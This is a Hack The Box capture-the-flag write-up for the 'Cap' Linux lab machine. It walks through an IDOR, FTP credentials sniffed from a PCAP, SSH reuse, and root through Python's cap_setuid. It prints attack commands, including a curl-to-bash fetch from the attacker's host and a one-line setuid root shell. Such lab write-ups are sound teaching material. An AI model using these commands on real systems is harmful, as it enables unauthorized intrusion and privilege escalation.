HtB Walkthroughs

Cap - Easy Linux

Magnus Ensted Danielsen

6 min read
Cap — HTB Writeup
// writeups / HackTheBox
Hack The Box — Machine Writeup

Cap.

Easy Linux Mar 7, 2026 IDOR · FTP Sniffing · Linux Capabilities

Cap is an easy Linux machine hosting a security dashboard with a classic IDOR vulnerability. A network capture exposes FTP credentials in plaintext, granting an initial foothold. Privilege escalation abuses a misconfigured Python capability (cap_setuid) for a trivial root shell.

Difficulty
Easy
01 —

Reconnaissance

Starting with an Nmap scan to enumerate open ports and service versions:

nmap -sC -sV -oN cap.nmap 10.129.1.204

The scan reveals three open ports:

Port Service Version Notes
21/tcp FTP vsftpd 3.0.3 Worth revisiting
22/tcp SSH OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp HTTP Gunicorn Security Dashboard

The webserver is a Python/Gunicorn app advertising itself as a "Security Dashboard." That's interesting — let's poke at it.

02 —

IDOR — Accessing Other Users' Captures

After browsing to the dashboard and logging in as nathan, the app offers a page to view network packet captures. The URL looks something like /data/1 — with a numeric ID in the path.

🔎
Vulnerability Found — IDOR Changing the ID parameter to 0 exposes captures belonging to other users. No authorization check is performed server-side.

At /data/0 we find a PCAP file we didn't generate. Time to download it and open it in Wireshark.

03 —

FTP Credential Extraction

Opening the PCAP in Wireshark and filtering for FTP traffic immediately reveals a plaintext login sequence. FTP transmits credentials with no encryption:

ftp
<-- 220 (vsFTPd 3.0.3)
USER nathan
<-- 331 Please specify the password.
PASS Buck3tH4TF0RM3!
<-- 230 Login successful.
🔑
Credentials Recovered nathan : Buck3tH4TF0RM3!
04 —

Initial Foothold — SSH as Nathan

Users tend to reuse passwords. The FTP credentials work over SSH too:

ssh nathan@10.129.1.204
# password: Buck3tH4TF0RM3!
User Flag — Captured cat ~/user.txt — flag in hand.
05 —

Privilege Escalation — Linux Capabilities

With a foothold established, it's time to enumerate for privilege escalation. Dropping LinPEAS onto the box via a Python HTTP server:

python3 -m http.server 8000
curl http://<YOUR_IP>:8000/linpeas.sh | bash

LinPEAS highlights something juicy — a non-standard Linux capability assigned to the Python binary:

/usr/bin/python3.8 = cap_setuid+ep
⚠️
Misconfiguration — cap_setuid on Python cap_setuid allows a process to arbitrarily change its UID. When granted to an interpreter like Python, an attacker can call os.setuid(0) to become root without ever needing the SUID bit or sudo rights.

Exploiting this is trivially simple — one line of Python:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
🏴
Root Shell Obtained We are now uid=0(root). Grab /root/root.txt and we're done.
06 —

Attack Chain Summary

Nmap Scan
Identified FTP (21), SSH (22), and a Gunicorn web app (80).
IDOR on /data/:id
Setting the capture ID to 0 exposed another user's PCAP file.
FTP Credential Sniffing
Wireshark analysis of the PCAP revealed nathan:Buck3tH4TF0RM3! in plaintext.
SSH Login → user.txt
Password reuse granted SSH access and the user flag.
cap_setuid Abuse → root
Python's cap_setuid capability was exploited to spawn a root shell.
User Flag
Obtained via SSH as nathan
Root Flag
Obtained via cap_setuid Python exploit

// HackTheBox · Cap · Easy · Linux · Rooted